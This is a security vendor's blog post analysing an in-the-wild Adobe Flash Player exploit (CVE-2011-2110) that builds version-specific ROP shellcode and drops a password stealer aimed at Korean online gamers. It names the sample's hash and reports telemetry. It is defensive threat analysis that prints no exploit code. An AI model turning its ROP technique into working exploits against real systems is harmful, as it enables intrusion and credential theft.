Get on-the-go access to the latest insights featured on our Trustworthy Computing blogs.
On June 14, Adobe released updates and a security bulletin (APSB11-18) referencing attacks affecting Adobe Flash Player (versions 10.3.181.23 and earlier). These attacks have been observed as hosted on webpages containing malformed SWF files. We spent some time analyzing this Flash Player vulnerability (described in CVE-2011-2110) and are providing some technical details of this in-the-wild exploit.
The following steps describe how the SWF constructs the shellcode:
Details of the exploitation process:
Unlike other SWF exploits, this exploit doesn't use heap-spray technique. Instead, it uses a 3-stage ROP-based attacking process, which can be described as the following:
Figure 1: ROP address adjustment according to Flash version and container type
The unique thing about this malware is that it is version-specific when constructing shellcode. Rather than just using a static shellcode, it's building it according to the Flash Player version and the type of container holding the SWF file (see Figure 1 above). Based on this information, it's adjusting the ROP gadget addresses (see Figure 2 below). Every gadget address is inside the Flash Player's own DLL and this makes the exploit process very stable. Currently we saw the malware targeting versions 10.3.181.14, 10.3.181.22 and 10.3.181.23.
Figure 2: The dynamically built shellcode based on Flash Player version
The downloaded PE file
The downloaded PE file executed by the shellcode is detected as PWS:Win32/OnLineGames.ZDV (SHA1: 4a13a14523fe95817cc53c75f86ee4af36ee2464) which specifically targets the Korean online games community. This focus on Korea has been also evident in our telemetry from our protected Microsoft Security Essentials and Forefront customers, where, aside from one day (June 22) where attacks increased in Europe and Russia, attack attempts have been predominantly reported from computers in Korea.
Figure 3: MMPC Telemetry on CVE-2011-2110 Attack Attempts during June 17 – 30, 2011
-- Jeong Wook Oh, Chun Feng & Marian Radu